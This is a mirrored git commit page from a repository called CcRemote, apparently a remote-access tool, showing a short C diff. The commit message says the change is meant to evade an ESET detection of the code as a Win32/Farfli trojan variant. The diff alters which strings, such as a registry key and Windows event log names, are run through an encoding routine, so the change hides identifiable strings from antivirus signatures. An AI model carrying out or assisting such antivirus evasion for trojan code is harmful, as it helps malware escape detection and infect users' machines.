mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-08-12 20:01:45 +00:00
Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan
This commit is contained in:
Binary file not shown.
Binary file not shown.
@@ -39,10 +39,10 @@ char* uncode(char* str)
|
||||
|
||||
int main()
|
||||
{
|
||||
char a[] = "Mozilla/4.0 (compatible)";
|
||||
char b[] = "VideoCapWindow";
|
||||
char c[] = "LyxInstaller.exe";
|
||||
char d[] = "%-24s %-15s 0x%x";
|
||||
char a[] = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
|
||||
char b[] = "Security";
|
||||
char c[] = "System";
|
||||
char d[] = "Application";
|
||||
char* s1 = crycode(a);
|
||||
char* s2 = crycode(b);
|
||||
char* s3 = crycode(c);
|
||||
|
Reference in New Issue
Block a user